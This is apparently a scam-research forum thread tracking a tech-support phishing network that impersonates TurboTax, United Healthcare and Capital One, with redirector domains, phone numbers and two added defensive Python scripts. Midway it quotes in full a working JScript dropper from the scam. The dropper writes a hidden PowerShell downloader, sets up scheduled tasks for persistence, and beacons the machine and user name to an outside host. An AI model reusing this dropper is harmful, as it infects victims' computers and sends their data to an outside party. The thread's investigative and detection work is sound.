Now some news: the redirector has changed its target to https://activation.begin.rest/turbotax/
I reported this multi-scam website here:
suspecting that it was a Web InfoTech property. Now there is more evidence.
Another thing, kind of a puzzle:
A bunch of this scam group’s impersonation websites share this “DG” logo
as a favicon and/or elsewhere. It never seems related to the supposed topic of the website (TurboTax, HBO Max, Fidelity Investments…)
What does DG stand for? Is it a clue?
Guess what? This same number is also the “support” number for the Microsoft mobile phone linking scheme
Phishing page https://akas.prinset.shop/
inevitably leads to the fake error page Phone Link
Associated tawk.to account https://tawk.to/chat/65182c27e6bed319d0048030/1hbj6oupp
These scammers are hungry – put your phone number in the form on the phishing page and Peter Mam or one of his fellow Support Executives will call you right away on a Saturday. I got a call from Peter Mam on 856-212-1306.
I submitted the phishing page. Sunday.
Here’s what I think is another piece of their Internet infrastructure.
Take for example this fake TurboTax page https://installtaxturbo.com/install-turbotax-with-license-code/
It links to the site Download & Install TurboTax® Desktop 2024-2025 which I’ve noted as a suspected Web Infotech property in a couple other threads, via a redirecting domain, “ww0.us.”
see Fake HP Printer scammer websites - #10 by ElmerFudde2020 for another example.
Now, for the redirection to work, an HTTP parameter has to be passed to ww0.us (after the “?” in the URL). The usual parameters I’ve seen seem to be base64-encoded URLs.
However, what about a sort of default or dummy parameter? Is there a default or fallback response?
What if we tried https://ww0.us/?I_AM_A_SCAMMER ?
Guess where it redirects to?
More on ww0.us: Currently Whois records say the domain is administered by a “Roger Watts” at a very modest residential address in New Jersey (I’m not going to post the exact address because there’s a good chance it’s fake and whoever lives there has nothing to do with this).
Registered admin email [email protected] is also the admin for two obvious phishing domains, both registered in January of this year
https://activateuhccom.us/ and https://activateuhc.us/ , both pretending to be United Healthcare, and both of which are probably more scammy than the real UHC which is hard to beat.
The link on the second address uses the ww0.us redirector/obfuscator!
aHR0cHM6Ly9hY3RpdmF0ZXVoYy51cw== is just the originating URL, https://activateuhc.us , in base64.
It redirects to (where else?) a subdirectory of activation.begin.support – setup your activate.uhc.com (it will return a dummy page unless you access it through the phishing redirector link).
and of course there’s an error, why not! setup your activate.uhc.com
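The two posts above describe how the ww0.us hop works: the target URL is carried in base64 after the “?”, and the scam page only renders for the right referrer and user-agent. The script below is an added example (not code from the thread or from the scammers’ kit) that decodes such a token, builds one for testing, and can walk a redirect chain under a chosen User-Agent. The link shape https://ww0.us/?<base64> and the token aHR0cHM6Ly9hY3RpdmF0ZXVoYy51cw== are taken from the thread; the function names, the “?b=<token>” variant and the User-Agent strings are my own assumptions.

```python
"""Decode / build the base64 target of a ww0.us-style redirector link and
optionally walk the HTTP redirect chain under a chosen User-Agent.

Added example, not code from the thread.  Link shape and sample token come from
the thread; function names, the keyed "?b=<token>" variant and the User-Agent
strings are assumptions.
"""
import base64
import urllib.error
import urllib.parse
import urllib.request


def _b64_to_url(token: str):
    """Decode one (possibly URL-safe, possibly unpadded) base64 token.
    Returns the text only if it is an http(s) URL, else None."""
    std = urllib.parse.unquote(token).replace("-", "+").replace("_", "/")
    std += "=" * (-len(std) % 4)                 # tolerate stripped padding
    try:
        text = base64.b64decode(std, validate=True).decode("utf-8")
        parts = urllib.parse.urlsplit(text)
    except ValueError:                           # binascii.Error / UnicodeDecodeError
        return None
    return text if parts.scheme in ("http", "https") and parts.netloc else None


def decode_redirector_param(url: str):
    """Return the target hidden after '?' in a redirector link, or None.
    Accepts the bare form  ?<token>  seen on ww0.us and a keyed form  ?b=<token>
    (the key name is an assumption)."""
    query = urllib.parse.urlsplit(url).query
    candidates = [query]
    if "=" in query:
        candidates.append(query.split("=", 1)[1])
    for cand in candidates:
        target = _b64_to_url(cand)
        if target:
            return target
    return None


def build_redirector_url(redirector: str, target: str) -> str:
    """Encode a target the way the kit does: standard base64 right after '?'."""
    token = base64.b64encode(target.encode("utf-8")).decode("ascii")
    return f"{redirector.rstrip('/')}/?{token}"


class _NoFollow(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None                              # raise on 3xx so every hop is visible


USER_AGENTS = {  # assumed representative strings for the client types the thread mentions
    "chrome-android": "Mozilla/5.0 (Linux; Android 13; Pixel 7) AppleWebKit/537.36 "
                      "(KHTML, like Gecko) Chrome/124.0 Mobile Safari/537.36",
    "safari-ios": "Mozilla/5.0 (iPhone; CPU iPhone OS 17_4 like Mac OS X) AppleWebKit/605.1.15 "
                  "(KHTML, like Gecko) Version/17.4 Mobile/15E148 Safari/604.1",
    "edge-windows": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                    "(KHTML, like Gecko) Chrome/124.0 Safari/537.36 Edg/124.0",
}


def follow_redirects(url: str, user_agent: str, referer: str = "", max_hops: int = 10):
    """Return [(status, url), ...] for each HTTP hop.  Needs network; not run on import.
    Only HTTP 3xx hops are recorded: meta-refresh and JavaScript redirects, which
    these kits also use, need a browser or a second pass over the response body."""
    opener = urllib.request.build_opener(_NoFollow)
    hops = []
    for _ in range(max_hops):
        headers = {"User-Agent": user_agent}
        if referer:
            headers["Referer"] = referer         # the previous hop, as a browser would send
        req = urllib.request.Request(url, headers=headers)
        try:
            with opener.open(req, timeout=15) as resp:
                hops.append((resp.status, url))
                return hops
        except urllib.error.HTTPError as err:
            hops.append((err.code, url))
            location = err.headers.get("Location")
            if not (300 <= err.code < 400 and location):
                return hops
            referer, url = url, urllib.parse.urljoin(url, location)
    return hops


if __name__ == "__main__":
    link = "https://ww0.us/?aHR0cHM6Ly9hY3RpdmF0ZXVoYy51cw=="
    print(decode_redirector_param(link))                              # https://activateuhc.us
    print(decode_redirector_param("https://ww0.us/?I_AM_A_SCAMMER"))  # None: not a URL
    # Live probe (network):  follow_redirects(link, USER_AGENTS["edge-windows"])
```

Run the live probe once per User-Agent in USER_AGENTS and diff the hop lists; the thread’s observation that Safari/iOS and Edge/Windows get the error page while Chrome/Android sometimes does not shows up as different final URLs. Decoding the token first tells you whether the redirector is carrying a real victim-facing URL or, as with I_AM_A_SCAMMER, falling back to a default target.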
New toll-free number: 855-222-8365. I get the standard “blacklisted” message that I get from Web Infotech numbers when I call from my main research phone.
But wait, there’s more. Up until December 26 of last year, ww0.us was owned by a Salman Khan of Rajasthan, email [email protected] (cool email address Salman!) The other domain registered to that address is a very suspicious https://youtube.gs/
*Note: Salman Khan is the name of a famous Bollywood actor, probably not the same guy! And quite likely not even a real name for one of our scammers, just a little joke from them.
I think the link has changed now!
New website: tx.newredir.com now redirects to Download & Install TurboTax® Desktop 2024-2025 .
So over the course of the month this multi-scam website has moved from activation.begin.rest to activation.begin.support to activation.begin.lat.
If your browser user-agent is set to Chrome on Android, tx.newredir.com once again redirects to https://ts.activatetax.pro/Installation-Error-Contact-Support.php . Probably works for some other browser user agent combos. New toll-free phone number: 855-531-2626.
Via a Google search I found another subdirectory of this multi-scam site. This one doesn’t seem to check for referrer, user-agent or HTTP parameters
A new domain I discovered today
The Google Sites page Activate my Capital One card online at Activate.capitalone.com links to
If the browser user agent is a mobile phone variety, it redirects to
https://activation-support.tax-com.com/capitalone/enter-code.php
with the error page https://activation-support.tax-com.com/capitalone/authentication-error.php
new toll-free number: 866-593-3778.
Here’s a spam post that’s a catalogue of related phishing sites, including other subdomains of tax-com.com:
(copy archived at web.archive.org: installturbotax | Players list | Bandori Party - BanG Dream! Girls Band Party)
And today this page has another new toll-free number: 855-613-0464.
New toll-free number spotted today: 855-668-8507.
New website and new phone number. The redirect yields the scamming page for Safari/iOS (but oddly, not Chrome/Android).
https://activation-support.tellmenew.com/capitalone/authentication-error.php
855-619-8688
866-217-2243 is active again at https://myefiling.online//Installation-Error-Contact-Support.php .
Update later the same day: a new toll free number, 855-923-3385.
In other news, the old redirecting site tx.newredir.com seems to have finally gone down (for now?) and all their thousands of SEO spam feeder pages are being updated with a new intermediate domain, ts.remdos.com. E.g. Installturbotax.com . Registrar is AppCroNix Infotech Private Limited, d/b/a VEBONIX.com, registered just five days ago.
Update on this: with my browser user agent set to MS Edge on Windows, activateuhc.us directs me via ww0.us to a new phishing domain, setup your activate.uhc.com . After entering my (fake) info, the form sends me to this page:
Which prompts me to download and install a zip-compressed EXE file and run it! Wow that can’t be good. Anyone want to do some analysis on the file?
The parent domain freetechsupport.org returns a bare-bones “tech support” website with a phone number: 856-240-0005.
Google says 856-240-0005 is also the number for:
So the “EXE” file is not actually a binary file but some kind of Powershell thing that downloads from various URLs – still very malicious!
// JScript dropper executed by the Windows Script Host (the "EXE" inside the zip).
var shell = new ActiveXObject("WScript.Shell");
var fso = new ActiveXObject("Scripting.FileSystemObject");
// Stage files under %LOCALAPPDATA%: user-writable, so no elevation prompt.
var localAppData = shell.ExpandEnvironmentStrings("%LOCALAPPDATA%");
var updateBatPath = localAppData + "\\update.bat";
var backupBatPath = localAppData + "\\backup.bat";
// update.bat launches a hidden PowerShell that fetches the next stage; the ".mp3"
// name disguises what is actually a batch script, saved as backup.bat.
var updateBatContent = "@echo off\n";
updateBatContent += "start /min cmd /c PowerShell.exe -WindowStyle Hidden -Command \"Invoke-WebRequest -Uri 'http://dr5.org/in.mp3' -OutFile '" + backupBatPath + "'\"\n";
var updateBatFile = fso.CreateTextFile(updateBatPath, true);
updateBatFile.Write(updateBatContent);
updateBatFile.Close();
// Persistence: a daily SCHTASKS entry run as the current user, created with a hidden
// window (0) and synchronously (true); "echo N" answers any overwrite prompt.
function createScheduledTask(taskName, taskTime, taskPath) {
var command = 'SCHTASKS /Create /SC DAILY /TN "' + taskName + '" /TR "' + taskPath + '" /ST ' + taskTime + ' /RU "' + shell.ExpandEnvironmentStrings("%USERNAME%") + '" /F';
shell.Run("cmd /c echo N | " + command, 0, true);
}
// Four tasks: morning and evening, the downloader one minute before the downloaded script.
createScheduledTask("MyTasks\\1", "11:05", '"' + updateBatPath + '"');
createScheduledTask("MyTasks\\2", "11:06", '"' + backupBatPath + '"');
createScheduledTask("MyTasks\\3", "19:05", '"' + updateBatPath + '"');
createScheduledTask("MyTasks\\4", "19:06", '"' + backupBatPath + '"');
// Beacon the victim's machine and user name to the operator, tagged with the "uhc" campaign.
var computerName = shell.ExpandEnvironmentStrings("%COMPUTERNAME%");
var userName = shell.ExpandEnvironmentStrings("%USERNAME%");
var url = "http://l77.org/downloading.php?dl=uhc&id=" + computerName + "_" + userName;
shell.Run("cmd /c start /min " + url, 0, false);
So, if you query this URL using a Windows Powershell user-agent string, you get something that isn’t an MP3 file (maybe the extension is to deceive firewalls or antivirus heuristics?) but a Windows shell script. I’m not good at analyzing this but it involves scheduling a bunch of recurring background tasks, and something named Antivirus-Update.bat. Any experts out there who can help decoding this?
I’m trying to paste the code into this comment but I’m getting a “403 error,” maybe it’s too long or something?
Update: I put the file through hybrid-analysis.com and it says it’s the “Trojan.Script.Agent.khixek” aka the AdsExhaust trojan, which supposedly generates fake clicks on pay-per-click ads or something like that?
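For anyone who wants to hunt for this on a machine or in logs, here is an added example (not code from the thread, the scammers, or hybrid-analysis) that pulls the indicators out of the dropper quoted above and matches them against scheduled-task creation events. DROPPER is a constructed excerpt that keeps only the strings visible in the thread (task names MyTasks\1–4, update.bat and backup.bat in %LOCALAPPDATA%, dr5.org and l77.org); SAMPLE_EVENTS are constructed records shaped like Windows Security event 4698 (“A scheduled task was created”), not real logs, and the function names are my own.

```python
"""Static IOC extraction from the WScript dropper, plus a scheduled-task check.

Added example, not code from the thread.  DROPPER is a constructed excerpt
reproducing the strings shown in the thread; SAMPLE_EVENTS are constructed
records modelled on Windows Security event 4698 fields, not real logs.
"""
import re
from urllib.parse import urlsplit

DROPPER = r'''
var shell = new ActiveXObject("WScript.Shell");
var localAppData = shell.ExpandEnvironmentStrings("%LOCALAPPDATA%");
var updateBatPath = localAppData + "\\update.bat";
var backupBatPath = localAppData + "\\backup.bat";
var updateBatContent = "@echo off\n";
updateBatContent += "start /min cmd /c PowerShell.exe -WindowStyle Hidden -Command \"Invoke-WebRequest -Uri 'http://dr5.org/in.mp3' -OutFile '" + backupBatPath + "'\"\n";
createScheduledTask("MyTasks\\1", "11:05", '"' + updateBatPath + '"');
createScheduledTask("MyTasks\\2", "11:06", '"' + backupBatPath + '"');
createScheduledTask("MyTasks\\3", "19:05", '"' + updateBatPath + '"');
createScheduledTask("MyTasks\\4", "19:06", '"' + backupBatPath + '"');
var url = "http://l77.org/downloading.php?dl=uhc&id=" + computerName + "_" + userName;
'''

URL_RE = re.compile(r"https?://[^\s'\"<>]+")
TASK_RE = re.compile(r'createScheduledTask\("([^"]+)"')
DROP_RE = re.compile(r'\+ "\\\\([\w.-]+\.(?:bat|cmd|ps1|vbs|js|exe))"')


def _unique(items):
    seen, out = set(), []
    for it in items:
        if it not in seen:
            seen.add(it)
            out.append(it)
    return out


def extract_iocs(script_text: str) -> dict:
    """URLs, domains, scheduled-task names and dropped file names from the dropper."""
    urls = _unique(URL_RE.findall(script_text))
    return {
        "urls": urls,
        "domains": _unique(urlsplit(u).netloc.lower() for u in urls),
        # JScript source escapes backslashes: "MyTasks\\1" is the task MyTasks\1
        "task_names": [t.replace("\\\\", "\\") for t in TASK_RE.findall(script_text)],
        "dropped_files": _unique(DROP_RE.findall(script_text)),
    }


# Signals for a scheduled-task creation record (event 4698 "Task Content" / Command).
PROFILE_DIR_RE = re.compile(
    r"(%localappdata%|%appdata%|%temp%|\\appdata\\(?:local|roaming)\\|\\temp\\)", re.I)
SCRIPT_EXT_RE = re.compile(r"\.(?:bat|cmd|ps1|vbs|js|jse|wsf|hta)\b", re.I)
HIDDEN_PS_RE = re.compile(r"powershell.*-windowstyle\s+hidden", re.I)


def task_reasons(event: dict, iocs: dict) -> list:
    """Why this task creation looks like the dropper's persistence, if at all."""
    cmd = event["command"]
    reasons = []
    if PROFILE_DIR_RE.search(cmd):
        reasons.append("action runs from a user-writable profile directory")
    if SCRIPT_EXT_RE.search(cmd):
        reasons.append("action is a script rather than a signed binary")
    if HIDDEN_PS_RE.search(cmd):
        reasons.append("action launches hidden PowerShell")
    if event["task_name"].lstrip("\\") in iocs["task_names"]:
        reasons.append("task name matches dropper indicator")
    if any(f.lower() in cmd.lower() for f in iocs["dropped_files"]):
        reasons.append("action references a dropped file name")
    return reasons


def scan_events(events: list, iocs: dict, min_reasons: int = 2) -> list:
    """Return [(event, reasons)] for records with at least min_reasons signals."""
    flagged = []
    for ev in events:
        reasons = task_reasons(ev, iocs)
        if len(reasons) >= min_reasons:
            flagged.append((ev, reasons))
    return flagged


SAMPLE_EVENTS = [  # constructed records; command is the expanded /TR argument
    {"task_name": "\\MyTasks\\1", "command": '"C:\\Users\\victim\\AppData\\Local\\update.bat"', "user": "victim"},
    {"task_name": "\\MyTasks\\2", "command": '"C:\\Users\\victim\\AppData\\Local\\backup.bat"', "user": "victim"},
    {"task_name": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag",
     "command": "%windir%\\system32\\defrag.exe -c -h -o -$", "user": "SYSTEM"},
    {"task_name": "\\GoogleUpdateTaskMachineUA",
     "command": '"C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe" /ua /installsource scheduler',
     "user": "SYSTEM"},
]

if __name__ == "__main__":
    iocs = extract_iocs(DROPPER)
    for key, vals in iocs.items():
        print(f"{key}: {vals}")
    for ev, reasons in scan_events(SAMPLE_EVENTS, iocs):
        print(ev["task_name"], "->", "; ".join(reasons))
```

The two benign records stay silent because a single weak signal never flags on its own; the dropper’s tasks trip several at once (script in AppData\Local plus a direct indicator match). On a live host the same names are what you would look for with schtasks /Query /FO LIST /V, and the two .bat files under %LOCALAPPDATA% are the artifacts to collect before cleanup.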
ts.remdos.com is still going, but a new intermediate redirector domain has been added to the multiple-step path of redirection: taxredir.online, registered on 19 March 2025.
And a new toll-free fake Turbotax number: 855-984-0698.
Update 5 April 2025: New toll-free fake TurboTax: 855-984-0972.
Vonage number (786) 946-2540